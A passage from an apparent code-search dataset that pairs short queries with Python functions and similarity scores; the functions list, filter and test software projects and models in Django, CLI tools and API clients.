get_jira_issues('project = \"{}\" AND filter = 19589'.format(project))", "def get_projects(self):\n rps = self.start_date\n\n return Project.objects.filter(\n Q(active=True)\n & Q(\n Q(start_date__lte=rps)\n | Q(\n Q(start_date__gte=rps)\n & Q(start_date__lte=datetime.datetime.now().date())\n )\n | Q(start_date__isnull=True)\n )\n & Q(\n Q(end_date__gte=rps)\n | Q(end_date__isnull=True)\n )\n )", "def run_project_checks(sub: Submission, logger):\n\n project = sub.project\n codes = []\n found_submitter = False\n found_submitter_details = False\n\n # Contacts\n if not project.contacts:\n logger.error(\"No contacts found. At least one contact must be included.\")\n codes.append(\"PROJ-E01\")\n else:\n # Roles\n role_term = ontology_term(\"role\")\n allowed_roles = get_term_descendants(role_term[\"ontology\"], role_term[\"uri\"], logger)\n for i, c in enumerate(project.contacts):\n if c.roles:\n for r in c.roles:\n role_value = r.lower().rstrip()\n if role_value not in allowed_roles:\n logger.warning(\"Contact role \\\"{}\\\" is not an allowed term.\".format(role_value))\n codes.append(\"PROJ-E05\")\n elif role_value == \"submitter\":\n found_submitter = True\n if c.email and c.affiliation:\n found_submitter_details = True\n if not c.lastName:\n logger.error(\"A contact must have last name specified: {}.\".format(c))\n codes.append(\"PROJ-E02\")\n # At least one contact must have role \"submitter\"\n if not found_submitter:\n logger.error(\"At least one contact must have role \\\"submitter\\\".\")\n codes.append(\"PROJ-E03\")\n # At least one submitter contact needs email and affiliation\n if not found_submitter_details:\n logger.error(\"At least one contact with role \\\"submitter\\\" must have email and affiliation specified.\")\n codes.append(\"PROJ-E04\")\n\n # Format of PubMed ID and DOI\n if project.publications:\n for pub in project.publications:\n if pub.pubmedId:\n try:\n int(pub.pubmedId)\n except ValueError:\n logger.error(\"PubMed ID must be numerical. Got \\\"{}\\\".\".format(pub.pubmedId))\n codes.append(\"PROJ-E06\")\n if pub.doi:\n if not REGEX_DOI_FORMAT.match(pub.doi.rstrip()):\n logger.error(\"Publication DOI \\\"{}\\\" does not match expected pattern.\".format(pub.doi))\n codes.append(\"PROJ-E07\")\n\n # Release date\n if project.releaseDate:\n if not REGEX_DATE_FORMAT.match(project.releaseDate):\n logger.error(\"Release date \\\"{}\\\" is not in YYYY-MM-DD format.\".format(project.releaseDate))\n codes.append(\"PROJ-E09\")\n else:\n logger.error(\"No release date found. Project must have release date specified.\")\n codes.append(\"PROJ-E08\")\n\n return codes", "def test_get_valid_filter(mockclient_cl1):\n r = mockclient_cl1.get(TEST_URL + \"?p=1\")\n assert r.status_code == 200", "def open_projects(request):\n return Project.objects.prefetch_related('task_set').filter(user=request.user, open=True)", "def getSpecificData(self,\n release=\"\",\n baseline=\"\",\n project=\"\",\n filters=[\"INPUT_DATA\",\"REVIEW\",\"VTPR\",\"\"],\n source=False):\n if source:\n table = []\n type_items = \"(cvtype='ascii' or cvtype='csrc' or cvtype='incl')\"\n else:\n table = [[],[],[],[]]\n type_items = \"(cvtype='xls' or cvtype='doc' or cvtype='pdf' or cvtype='ascii' or cvtype='csrc' or cvtype='incl')\"\n enabled = True\n for list_filter in filters:\n if self._is_array(list_filter):\n for keyword in list_filter:\n self.ihm.log('Search folder containing keyword: ' + keyword)\n else:\n self.ihm.log('Search folder containing keyword: ' + list_filter)\n stdout = self._runFinduseQuery(release,project,type_items,enabled)\n #print \"STDOUT\",stdout\n\n if not stdout:\n if source:\n print \"FILTER/PROJECT\",list_filter,project\n result = []\n if self._is_array(list_filter):\n for keyword in list_filter:\n self.getItemsInFolder(keyword,\n project,\n baseline,\n release,\n only_name=True,\n with_extension=True,\n mute=True,\n recur=True,\n converted_list=result)\n if result:\n break\n else:\n self.getItemsInFolder(list_filter,\n project,\n baseline,\n release,\n only_name=True,\n with_extension=True,\n mute=True,\n recur=True,\n converted_list=result)\n if result:\n table = result\n else:\n index = 0\n for list_filter in filters:\n result = []\n if self._is_array(list_filter):\n for keyword in list_filter:\n print (\"KEYWORD:\",index,keyword)\n self.getItemsInFolder(keyword,\n project,\n baseline,\n release,\n only_name=True,\n with_extension=True,\n mute=True,\n recur=True,\n converted_list=result)\n if result:\n table[index].extend(result)\n else:\n print (\"KEYWORD2:\",list_filter)\n self.getItemsInFolder(list_filter,\n project,\n baseline,\n release,\n only_name=True,\n with_extension=True,\n mute=True,\n recur=True,\n converted_list=result)\n if result:\n table[index] = result\n index += 1\n print \"OLD TABLE\",table\n return table\n else:\n if enabled:\n if stdout != \"\":\n self.ihm.log(stdout,False)\n regexp, list_items_skipped = self._prepareRegexp(filters)\n output = stdout.splitlines()\n if not source:\n ## print \"REGEXP\"\n ## print regexp\n for line in output:\n item = self._filterRegexp(regexp[0],line)\n if item != \"\":\n list_items_skipped[0].append(item)\n item = self._filterRegexp(regexp[1],line)\n if item != \"\":\n list_items_skipped[1].append(item)\n item = self._filterRegexp(regexp[2],line)\n if item != \"\":\n list_items_skipped[2].append(item)\n # ex: SW_PLAN\\SDP\\IS_SDP_SW_PLAN_SQA.xlsm-1.7.0@SW_PLAN-1.3\n table[0] = list(set(list_items_skipped[0]))\n table[1] = list(set(list_items_skipped[1]))\n table[2] = list(set(list_items_skipped[2]))\n for data in table[0]:\n if self._is_array(filters[0]):\n text = \"\"\n for filter in filters[0]:\n text += \" \" + filter\n else:\n text = filters[0]\n self.ihm.log('Found in '+ text +' folder: ' + data,False)\n for data in table[1]:\n if self._is_array(filters[1]):\n text = \"\"\n for filter in filters[1]:\n text += \" \" + filter\n else:\n text = filters[1]\n self.ihm.log('Found in '+ text +' folder: ' + data,False)\n for data in table[2]:\n if self._is_array(filters[2]):\n text = \"\"\n for filter in filters[2]:\n text += \" \" + filter\n else:\n text = filters[2]\n self.ihm.log('Found in '+ text +' folder: ' + data,False)\n else:\n ## print \"REGEXP\"\n ## print regexp\n for line in output:\n item = self._filterRegexp(regexp[0],line)\n if item != \"\":\n list_items_skipped[0].append(item)\n # ex: SW_PLAN\\SDP\\IS_SDP_SW_PLAN_SQA.xlsm-1.7.0@SW_PLAN-1.3\n table = list(set(list_items_skipped[0]))\n for data in table:\n if self._is_array(filters[0]):\n text = \"\"\n for filter in filters[0]:\n text += \" \" + filter\n else:\n text = filters[0]\n self.ihm.log('Found in '+ text +' folder: ' + data,False)\n else:\n self.ihm.log('No items found with finduse command.')\n return table", "def list_projects():\n\n cmd = dict()\n cmd[\"type_\"] = \"list_projects\"\n cmd[\"name_\"] = \"\"\n \n s = comm.send_and_receive_socket(cmd)\n\n msg = comm.recv_string(s)\n\n if msg != \"Success!\":\n raise Exception(msg)\n \n json_str = comm.recv_string(s) \n \n s.close() \n\n return json.loads(json_str)[\"projects\"]", "def _DoFilter(context, api_version_default):\n cloud_resources.REGISTRY.SetParamDefault(\n api='sql', collection=None, param='project',\n resolver=resolvers.FromProperty(properties.VALUES.core.project))\n\n context['sql_client'] = apis.GetClientInstance('sql', api_version_default)\n context['sql_messages'] = apis.GetMessagesModule('sql', api_version_default)\n context['registry'] = cloud_resources.REGISTRY.Clone()\n context['registry'].RegisterApiByName('sql', api_version_default)\n\n return context", "def get_projects(self):\n return self.http_call(\"get\", url=f\"{self.base_url}/projects\").json()", "def list_projects(ctx):\n pprint(ctx.obj.groups.get().data)", "def get_projects(self, source=\"all\"):\n self.projects = []\n self._project_indices_by_id = {}\n self._project_indices_by_name = {}\n\n if self.hub_type == self.NAMESPACES[\"a.\"]:\n if not self.auth.three_legged:\n self.logger.warning(\n \"Failed to get projects. '{}' hubs only supports 3-legged access token.\".format( # noqa:E501\n self.NAMESPACES[\"a.\"]\n )\n )\n else:\n for project in self.api.dm.get_projects():\n self.projects.append(\n Project(\n project[\"attributes\"][\"name\"],\n project[\"id\"][2:],\n data=project,\n app=self,\n )\n )\n\n self._project_indices_by_id[project[\"id\"][2:]] = (\n len(self.projects) - 1\n )\n self._project_indices_by_name[\n project[\"attributes\"][\"name\"]\n ] = (len(self.projects) - 1)\n\n elif self.hub_type == self.NAMESPACES[\"b.\"]:\n\n if source.lower() in (\"all\", \"docs\"):\n for project in self.api.dm.get_projects():\n self.projects.append(\n Project(\n project[\"attributes\"][\"name\"],\n project[\"id\"][2:],\n data=project,\n app=self,\n )\n )\n\n self._project_indices_by_id[project[\"id\"][2:]] = (\n len(self.projects) - 1\n )\n self._project_indices_by_name[\n project[\"attributes\"][\"name\"]\n ] = (len(self.projects) - 1)\n\n if (\n source.lower() in (\"all\", \"admin\")\n and not self.auth.three_legged\n ):\n\n for project in self.api.hq.get_projects():\n if project[\"id\"] in self._project_indices_by_id:\n self.projects[\n self._project_indices_by_id[project[\"id\"]]\n ].data = project\n else:\n self.projects.append(\n Project(\n project[\"name\"],\n project[\"id\"],\n data=project,\n app=self,\n )\n )\n self._project_indices_by_id[project[\"id\"]] = (\n len(self.projects) - 1\n )\n\n self._project_indices_by_name[project[\"name\"]] = (\n len(self.projects) - 1\n )\n\n elif source.lower() in (\"all\", \"admin\"):\n self.logger.debug(\n \"Failed to get projects. The BIM 360 API only supports 2-legged access tokens\" # noqa:E501\n )", "def get_projects(self):\n return conf.projects", "def list_projects():\n with BMI(_username, _password, constants.BMI_ADMIN_PROJECT) as bmi:\n ret = bmi.list_projects()\n if ret[constants.STATUS_CODE_KEY] == 200:\n table = PrettyTable(\n field_names=[\"Id\", \"Name\", \"Provision Network\"])\n projects = ret[constants.RETURN_VALUE_KEY]\n for project in projects:\n table.add_row(project)\n click.echo(table.get_string())\n else:\n click.echo(ret[constants.MESSAGE_KEY])", "def test_project_list_with_projects(self):\n # Add test projects.\n first_project = add_project(title='Title 1', description='Description 1')\n second_project = add_project(title='Title 2', description='Description 2')\n\n # Check that project list contains test projects.\n response = self.client.get(reverse('portfolio:project_list'))\n self.assertEqual(response.status_code, 200)\n self.assertContains(response, first_project.title)\n self.assertContains(response, first_project.description)\n self.assertContains(response, second_project.title)\n self.assertContains(response, second_project.description)", "def test_returns_404_if_project_doesnt_exist(self):\n # Act\n response = self.client.get(\"/api/v2/projects/999/queries/aoi/\")\n self.assertEqual(response.status_code, 404)", "def project_list(cursor):\n query = \"SELECT * FROM projects\"\n try:\n cursor.execute(query, {},)\n except Exception as e:\n on_error(e)\n else:\n projects = cursor.fetchall()\n raise Return((projects, None))", "def get_projects(self):\n if not self.validate():\n raise SettingCustomVisionAccessFailed\n return self.get_trainer_obj().get_projects()", "def stract_scans(self, projects):\n pass", "def get_create_projects(target, proposal_ref, proposal_code='lb'):\n\n # Note that in the loader this is based on information in the PROPOSALS and VISITS files\n # TODO Multiple Visits can be defined in a file apparently - future improvement.\n # TODO NB LIne above in delete_users - redundant if using ISPYB??.\n # For the online loader it comes from the proposal_ref\n\n projects = []\n # The first word is the ISPY proposal/visit name that is used as the title of the project.\n # It can be set to OPEN in which case there are no users.\n visit = proposal_ref.split()[0]\n # If the visit is not prefixed by the proposal code\n # (typically a 2-letter sequence like \"lb\") then prefix it.\n if visit[0].isdigit():\n visit = f\"{proposal_code}{visit}\"\n project = Project.objects.get_or_create(title=visit)[0]\n projects.append(project)\n\n # If not open then delete users for the project and re-add them based on supplied fed-ids.\n delete_users(project)\n\n # Update project_id on target.\n target.project_id.add(project)\n\n # Remaining words in proposal_ref (if any) must be fedid's which are used to find users information.\n num_users = 0\n for fedid in proposal_ref.split()[1:]:\n user = User.objects.get_or_create(username=fedid, password=\"\")[0]\n project.user_id.add(user)\n num_users += 1\n if num_users == 0:\n project.open_to_public = True\n\n target.upload_progess = 10.00\n target.save()\n\n return projects", "def search(request, is_my_list=\"False\"):\n\n search_type = request.GET.get(\"submit\")\n if search_type:\n\n # get query field\n query = ''\n if request.GET.get(search_type):\n query = request.GET.get(search_type)\n\n proj_ids = []\n cod_ids = []\n\n valid_searches = [constants.STRING_TITLE, constants.STRING_DESCRIPTION, constants.STRING_PROTOCOL,\n constants.STRING_CODER, constants.STRING_AREA, constants.STRING_WORKINGGROUP]\n\n search_in_all = True\n for v in valid_searches:\n if v in request.GET:\n search_in_all = False\n break\n\n if search_in_all or request.GET.get(constants.STRING_TITLE):\n codings = CodingProject.objects.all()\n for cod in codings:\n if query.lower() in cod.title.lower():\n cod_ids.append(cod.id)\n\n if search_in_all or request.GET.get(constants.STRING_DESCRIPTION):\n codings = CodingProject.objects.all()\n for cod in codings:\n if query.lower() in cod.additional_information.lower():\n cod_ids.append(cod.id)\n\n if request.GET.get(constants.STRING_PROTOCOL):\n proj_ids += ProjectContainer.objects.filter(protocol__icontains=query).values_list('id', flat=True)\n\n if search_in_all or request.GET.get(constants.STRING_CODER):\n for pr in ProjectContainer.objects.all():\n for cd in pr.codings.all():\n user = Person.objects.using('datatracker').get(id=cd.coder)\n if query.lower() in user.name.lower():\n proj_ids.append(pr.id)\n break\n\n if search_in_all or request.GET.get(constants.STRING_AREA):\n for project_container in ProjectContainer.objects.all():\n docs = []\n if not project_container.docs or project_container.docs == '':\n continue\n keys = filter(None, project_container.docs.split(';'))\n docs.extend(list(DocAlias.objects.using('datatracker').filter(name__in=keys).values_list(\n 'document__group__parent__name')))\n for doc in docs:\n if query.lower() in doc[0].lower():\n proj_ids.append(project_container.id)\n break\n # ids += ProjectContainer.objects.filter(docs__document__group__parent__name__icontains=query).values_list(\n # 'id', flat=True)\n\n if search_in_all or request.GET.get(constants.STRING_WORKINGGROUP):\n for project_container in ProjectContainer.objects.all():\n docs = []\n if not project_container.docs or project_container.docs == '':\n continue\n keys = filter(None, project_container.docs.split(';'))\n docs.extend(list(\n DocAlias.objects.using('datatracker').filter(name__in=keys).values_list('document__group__name')))\n for doc in docs:\n if query.lower() in doc[0].lower():\n proj_ids.append(project_container.id)\n break\n \n if cod_ids:\n cod_ids = list(set(cod_ids))\n proj_ids += ProjectContainer.objects.filter(codings__id__in=cod_ids).values_list('id', flat=True)\n project_containers = ProjectContainer.objects.filter(id__in=list(set(proj_ids)))\n \n request.session[constants.ALL_CODINGS] = cod_ids\n request.session[constants.ALL_PROJECTS] = project_containers\n\n request.session[constants.MAINTAIN_STATE] = True\n\n return HttpResponseRedirect(\n settings.CODESTAND_PREFIX + '/codestand/matches/show_list/' + \n is_my_list + '/{0}/'.format(constants.ATT_CREATION_DATE) + 'True')\n\n else:\n return render_page(request, constants.TEMPLATE_MATCHES_SEARCH, {\n \"form\": SearchForm()\n })", "def get_created_projects(self):\n project_ouessant1 = Project.objects.get(name='Ouessant Tidal Power Phase I')\n project_ouessant2 = Project.objects.get(name='Ouessant Tidal Power Phase II')\n project_liaoning = Project.objects.get(\n name='Liaoning Linghai China Resource Power Wind Power Wind Farm'\n )\n return [project_ouessant1, project_ouessant2, project_liaoning]", "def test_returns_moderate_projects_if_difficulty_set_to_moderate(self):\n # Arrange\n self.test_project_2.private = False\n # Change difficulty of test_project_2 to easy so that it is not returned.\n self.test_project_2.difficulty = ProjectDifficulty.EASY.value\n # Act\n response = self.client.get(\n self.url,\n headers={\"Authorization\": self.user_session_token},\n query_string={\"difficulty\": \"MODERATE\"},\n )\n # User is only permitted to map test_project_1 and test_project_2, since test_project_3 is DRAFT.\n # So we should get only test_project_1 as it is the only project with difficulty set to MODERATE.\n # Assert\n self.assertEqual(response.status_code, 200)\n self.assertEqual(len(response.json[\"results\"]), 1)\n self.assertEqual(\n response.json[\"results\"][0][\"projectId\"], self.test_project_1.id\n )", "def project_list(ctx, parent_project_id, output_format, columns):\n data = ctx.obj.get_projects(parent_project_id=parent_project_id)\n if output_format == 'table':\n column_names = columns.split(',')\n output_table(column_names, data['project'])\n elif output_format == 'json':\n output_json_data(data)", "def select_approved_projects(self):\r\n print \"Selecting approved projects... \"\r\n global ANNUAL_BUDGET\r\n \r\n projects_citizens_sorted = sorted(self.projects_for_vote, key=lambda project:project.units, reverse=True)\r\n projects_reps_sorted = sorted(self.projects_for_vote, key=lambda project:project.p_units, reverse=True)\r\n budget_sum = 0\r\n \r\n for p in projects_citizens_sorted:\r\n budget_sum += p.budget\r\n if budget_sum <= ANNUAL_BUDGET/2:\r\n self.projects_approved.append(p)\r\n\r\n budget_sum = 0\r\n for p in projects_reps_sorted:\r\n if p not in self.projects_approved:\r\n budget_sum += p.budget\r\n if budget_sum <= ANNUAL_BUDGET/2:\r\n self.projects_approved.append(p)\r\n\r\n\r\n \r\n# raw_input(\"select_approved_projects - antes\")\r\n for p in projects_citizens_sorted:\r\n print p\r\n print \"\\nReps\\n\"\r\n for p in projects_reps_sorted:\r\n print p\r\n print \"\\nApproved\\n\"\r\n for p in self.projects_approved:\r\n print p\r\n\r\n raw_input(\"select_approved_projects - depois\")", "def projects(request):\n projects = (\n Project.objects.visible()\n .visible_for(request.user)\n .prefetch_related(\"latest_translation__user\")\n .order_by(\"name\")\n )\n\n if not projects:\n return render(request, \"no_projects.html\", {\"title\": \"Projects\"})\n\n return render(\n request,\n \"projects/projects.html\",\n {\"projects\": projects, \"top_instances\": projects.get_top_instances()},\n )", "def getAcceptedProjectsForOrg(org, limit=1000):\n q = getAcceptedProjectsQuery(org=org)\n return q.fetch(limit)", "def test_handle_list_no_teams(self):\r\n self.mock_facade.query.return_value = []\r\n self.assertTupleEqual(self.testcommand.handle(\"project list\", user),\r\n (\"No Projects Exist!\", 200))", "def get_projects():\n if current_user.get_id() is None:\n return\n with database.engine.begin() as connection:\n result = connection.execute(select(\n [models.projects.c.project_id, models.projects.c.name, models.projects.c.path, models.projects.c.creation_date, models.projects.c.user_id, func.count(models.objects.c.object_id).label('object_count')])\n .select_from(models.projects.outerjoin(models.objects))\n .where(and_(models.projects.c.active == True, models.projects.c.user_id == current_user.id))\n .group_by(models.projects.c.project_id)\n .order_by(models.projects.c.project_id))\n projects = [dict(row) for row in result]\n for project in projects:\n user = models.User.query.filter_by(\n id=project['user_id']).first()\n if user:\n project['email'] = user.email\n return projects", "def test_find_all(self):\n result = Project.objects.find(['test'], project_type=None)\n self.assertEqual(len(result), 2)\n result = Project.objects.find(['ThisFails'], project_type=None)\n self.assertEqual(len(result), 0)", "def _get_projects_from_userinfo(\n userinfo: typing.Dict[str, typing.Any],\n) -> typing.List[typing.Any] | None:\n if \"sdConnectProjects\" in userinfo:\n # Remove the possibly existing \"project_\" prefix\n projects = [\n p.removeprefix(\"project_\") for p in userinfo[\"sdConnectProjects\"].split(\" \")\n ]\n # we add this check in case the claim `sdConnectProjects does not exist`\n # and we want to enforce this at deployment\n elif setd[\"sdconnect_enabled\"] and \"sdConnectProjects\" not in userinfo:\n projects = []\n else:\n return None\n\n if len(projects) == 0:\n # No project group information received, aborting\n raise aiohttp.web.HTTPUnauthorized(reason=\"User is not a member of any project.\")\n\n return projects" ]
[ "0.8058686", "0.71893626", "0.70169073", "0.6866926", "0.6799763", "0.67065436", "0.66316026", "0.66316026", "0.6614815", "0.66046983", "0.65524906", "0.6446057", "0.64291626", "0.6345218", "0.63182366", "0.6217229", "0.6167629", "0.616253", "0.6144264", "0.612364", "0.6112479", "0.60485303", "0.6020033", "0.601014", "0.59872246", "0.59809744", "0.5969042", "0.59349597", "0.5930217", "0.5920709", "0.59140867", "0.59095335", "0.5906449", "0.58782214", "0.58736634", "0.584501", "0.5840118", "0.57996106", "0.57925254", "0.5760198", "0.575688", "0.57550955", "0.5754842", "0.57421345", "0.56866086", "0.56713486", "0.5662185", "0.5654776", "0.5647357", "0.5626675", "0.5622164", "0.56203324", "0.56203324", "0.5595656", "0.5590346", "0.5584246", "0.5570996", "0.55661833", "0.55575335", "0.55514795", "0.5549315", "0.55475223", "0.5535418", "0.5519913", "0.5511356", "0.5510358", "0.5505992", "0.5504367", "0.5501809", "0.54915065", "0.5487568", "0.54694885", "0.54669344", "0.5456739", "0.5453173", "0.544977", "0.54404896", "0.5439633", "0.5438768", "0.54375714", "0.54373366", "0.543077", "0.5411306", "0.53970873", "0.5387781", "0.5387754", "0.5376129", "0.5366216", "0.5339491", "0.533637", "0.533363", "0.53335464", "0.53268915", "0.53200483", "0.53125066", "0.5311114", "0.53049225", "0.5299056", "0.52960384", "0.52904713" ]
0.59895086
24
fetcher.get_models() should return a list of models.
def test_get_models_returns_models(fc: fetcher.Fetcher): ml = fc.get_models() assert isinstance(ml, list) assert isinstance(ml[0], models.LookmlModel)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _get_models(self, req, is_detail):\n context = req.environ['meteos.context']\n\n search_opts = {}\n search_opts.update(req.GET)\n\n # Remove keys that are not related to model attrs\n search_opts.pop('limit', None)\n search_opts.pop('offset', None)\n sort_key = search_opts.pop('sort_key', 'created_at')\n sort_dir = search_opts.pop('sort_dir', 'desc')\n\n models = self.engine_api.get_all_models(\n context, search_opts=search_opts, sort_key=sort_key,\n sort_dir=sort_dir)\n\n limited_list = common.limited(models, req)\n\n if is_detail:\n models = self._view_builder.detail_list(req, limited_list)\n else:\n models = self._view_builder.summary_list(req, limited_list)\n return models", "def models(self):\n \n # Call the Razor RESTful API to get a list of models\n headers = {'content-type': 'application/json'}\n r = requests.get(self.url + '/model', headers=headers)\n\n # Check the status code and return appropriately\n if r.status_code == 200:\n return json.loads(r.content)\n else:\n return 'Error in request, exited with status code:' + str(r.status_code)", "def models() -> list[str]:\n return list(models_url.keys())", "def get_models(self):\n self.load()\n return self._models", "def GetModels(self, request, context):\n context.code(beta_interfaces.StatusCode.UNIMPLEMENTED)", "def ListModels(self, request, context):\n context.code(beta_interfaces.StatusCode.UNIMPLEMENTED)", "def get_models(self, app_name):\n try:\n models = list(apps.get_app_config(app_name).get_models())\n return models\n except:\n raise LookupError(f\"this is no such app {app_name}\")", "def get_models(make):\n api_url = 'https://api.edmunds.com/api/vehicle/v2/{}/models?fmt=json&api_key={}'\\\n .format(make, API_KEY)\n r = requests.get(api_url).json()\n all_models = [model['name'] for model in r['models']]\n return all_models", "def get_model_list():\n with open(os.path.join(MODELS_FOLDER, \"models.json\"), \"r\") as model_file:\n model_list = json.load(model_file)\n return model_list", "def opt_get_all_models_rest_api():\n return retrieve_all_models()", "def get_models(self, model_names, callback):\n models = self.get_collection('_model')\n models.find(spec={'_id': {'$in': tuple(model_names)}}).to_list(\n callback=callback)", "def fetch_models(self):\n if self.model_pool is None:\n print(\"Please train a model first.\", file=STDE)\n EXIT(1)\n else:\n return [copy.deepcopy(m.steps[-1][-1]) for m in self.model_pool]", "def list_models(self, fields=['model_name']):\n\t\tmodels = dbop.get_models(self, model_type='all', fields=fields)\n\t\treturn models", "def list_models(SortBy=None, SortOrder=None, NextToken=None, MaxResults=None, NameContains=None, CreationTimeBefore=None, CreationTimeAfter=None):\n pass", "def load_models(self, models, iteration = None):\n print(\"NOT IMPLEMENTED YET\")", "def get_models_for_make(self, make):\n return self.get('vehicles/GetModelsForMake/{}'.format(make))", "def ListModels(self, request, context):\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')", "async def list_models(\n list_models_request: ListModels,\n token: str = Depends(oauth2_scheme),\n):\n try:\n logging.info(\"Calling /gcp/automl/list_models endpoint\")\n logging.debug(f\"Request: {list_models_request}\")\n if decodeJWT(token=token):\n response = ManageModelController().list_model_controller(\n request=list_models_request\n )\n return response\n else:\n raise HTTPException(\n status_code=status.HTTP_401_UNAUTHORIZED,\n detail=\"Invalid access token\",\n headers={\"WWW-Authenticate\": \"Bearer\"},\n )\n except Exception as error:\n logging.error(f\"Error in /gcp/automl/list_models endpoint: {error}\")\n raise error", "def import_data(self):\n self.models = []\n for o in self.loader.load():\n klass = self.type_for(o)\n if hasattr(klass, \"from_api\"):\n self.models.append(klass.from_api(o))\n else:\n self.models.append(klass(o))\n return self.models", "def get_models():\n\n from lmfit.models import lmfit_models\n models = lmfit_models\n if 'Expression' in models:\n del models['Expression']\n if 'Gaussian-2D' in models:\n del models['Gaussian-2D']\n\n filenames = set()\n\n models_path = pkg_resources.resource_filename('nexpy.api.frills',\n 'models')\n sys.path.append(models_path)\n for file_ in os.listdir(models_path):\n name, ext = os.path.splitext(file_)\n if name != '__init__' and ext.startswith('.py'):\n filenames.add(name)\n\n private_path = os.path.join(os.path.expanduser('~'), '.nexpy', 'models')\n if os.path.isdir(private_path):\n sys.path.append(private_path)\n for file_ in os.listdir(private_path):\n name, ext = os.path.splitext(file_)\n if name != '__init__' and ext.startswith('.py'):\n filenames.add(name)\n\n for name in sorted(filenames):\n try:\n module = importlib.import_module(name)\n models.update(dict((n.strip('Model'), m)\n for n, m in inspect.getmembers(module,\n inspect.isclass)\n if issubclass(m, Model) and n != 'Model'))\n except ImportError:\n pass\n\n return models", "def ListModels(self, request, context):\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')", "def ListModels(self, request, context):\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')", "def GetModels(self, request, context):\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')", "def _retrieve_models(local=True):\n # Check if the download folder exists\n def _get_meta_data(model_name, file):\n return {\n \"data\": {\n \"id\": model_name,\n \"name\": model_name,\n \"description\": model_name,\n \"filename\": os.path.join(\n app.config[\"DOWNLOAD_DIR\"], file),\n \"created\": time.ctime(os.path.getctime(\n os.path.join(\n app.config[\"DOWNLOAD_DIR\"],\n file))),\n \"modified\": time.ctime(os.path.getmtime(\n os.path.join(\n app.config[\"DOWNLOAD_DIR\"],\n file)))\n }\n }\n\n if not os.path.exists(app.config[\"DOWNLOAD_DIR\"]):\n os.makedirs(app.config[\"DOWNLOAD_DIR\"])\n\n if not local:\n # Fetch from a Nexus-hosted catalog\n resources = app.forge.search({\"type\": \"EmbeddingModel\"})\n for resource in resources:\n app.models[resource.name] = {\n \"data\": digest_model_data(resource),\n }\n app.forge.download(\n resource, \"distribution.contentUrl\",\n app.config[\"DOWNLOAD_DIR\"])\n\n pipeline_path = os.path.join(\n app.config[\"DOWNLOAD_DIR\"],\n resource.distribution.name)\n app.models[resource.name][\"object\"] = EmbeddingPipeline.load(\n pipeline_path,\n embedder_interface=GraphElementEmbedder,\n embedder_ext=\"zip\")\n\n # Clear the downloads dir\n for f in os.listdir(app.config[\"DOWNLOAD_DIR\"]):\n try:\n os.remove(os.path.join(app.config[\"DOWNLOAD_DIR\"], f))\n except Exception:\n shutil.rmtree(os.path.join(app.config[\"DOWNLOAD_DIR\"], f))\n else:\n # Fetch from a local dir\n for (_, dirs, files) in os.walk(app.config[\"DOWNLOAD_DIR\"]):\n for path in dirs + files:\n if path[0] != \".\":\n match = re.match(r\"(.*)\\.zip\", path)\n if match:\n model_name = match.groups()[0]\n else:\n model_name = path\n app.models[model_name] = _get_meta_data(model_name, path)\n pipeline_path = os.path.join(\n app.config[\"DOWNLOAD_DIR\"], path)\n app.models[model_name][\"object\"] = EmbeddingPipeline.load(\n pipeline_path,\n embedder_interface=GraphElementEmbedder,\n embedder_ext=\"zip\")\n break", "def getModels(makeURL):\n\n #Get make page as Soup\n soup, _ = getPage(makeURL)\n\n #Check if page available\n if soup is None:\n #Not available - break\n print(\"Can't find Make URL\")\n quit()\n\n #Try to find models list\n try:\n #Find span with text \"Make\"\n span = soup.find(class_=\"srp-filter-group__filter-name\", text=\"Make\")\n #Move up two parents\n a = span.parent.parent\n #Find all filter names\n b = a.find_all(class_=\"srp-list-filter__item-link link link--no-underline\")\n models = [i['href'] for i in b]\n models = models[1:]\n except:\n print(makeURL)\n models=[]\n \n logger.debug(f\"Models include: {models}\")\n return models", "def list_models():\n\tclsmembers = inspect.getmembers(sys.modules[__name__], inspect.isclass)\n\tverif = lambda cls: 'Verified: {0}'.format(cls[1]().verified)\n\tfit_models = [ (cls[0], verif(cls)) for cls in clsmembers if cls[1].__bases__[0] == core.FitModel ]\n\treturn fit_models", "def get_all_models() -> list:\n\n conn = database_connect()\n if(conn is None):\n return None\n cur = conn.cursor()\n\n try:\n # SQL statement and execute\n sql = \"\"\"SELECT manufacturer, description, modelnumber, weight\n FROM Model\"\"\"\n cur.execute(sql, ())\n\n # Attempt to fetch first row\n result = cur.fetchall()\n\n if result == None:\n cur.close()\n conn.close()\n return []\n\n models = []\n for row in result:\n models.append(\n [row[0], row[1], row[2], row[3]]\n )\n\n cur.close()\n conn.close()\n return models\n except Exception as e:\n print(\"fff\")\n print(e)\n # If login failed, return None\n cur.close()\n conn.close()\n return []", "def generate_model_list():\n\t\n\tmodels = [\n\t\tapi.v1.models.job.Job,\n\t]\n\treturn models", "def list_models(self):\n \n # Interpret the request data based on the expected row and column structure\n row_template = ['strData']\n col_headers = ['search_pattern']\n \n # Create a Pandas Data Frame for the request data\n self.request_df = utils.request_df(self.request, row_template, col_headers)\n \n # Get the list of models based on the search pattern\n search_pattern = self.request_df.loc[0, 'search_pattern']\n \n # If the search pattern is empty default to all models\n if not search_pattern.strip():\n search_pattern = '*'\n \n # Get the list of models as a string\n models = \"\\n\".join([str(p).split(\"\\\\\")[-1] for p in list(pathlib.Path(self.path).glob(search_pattern))])\n \n # Prepare the output\n self.response = pd.Series(models)\n \n # Finally send the response\n return self.response", "def ez_get_models(auth_token, options = None):\n status_code = 500\n try:\n API_REQUEST_URL = API_URL + \"/ez_get_models\"\n payload = {\n \"options\": options\n }\n headers = {\n \"Content-Type\": \"application/json\",\n \"Authorization\": \"Bearer \" + str(auth_token),\n }\n response = requests.request(\n \"POST\", API_REQUEST_URL, headers = headers, data = json.dumps(payload)\n )\n status_code = response.status_code\n try:\n response_json = response.json()\n except Exception as e:\n response.raise_for_status()\n response_json[\"status_code\"] = status_code\n return response_json\n except Exception as e:\n print((traceback.print_exc()))\n return exception_return(e, status_code)", "def GetModels(self, request, context):\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method 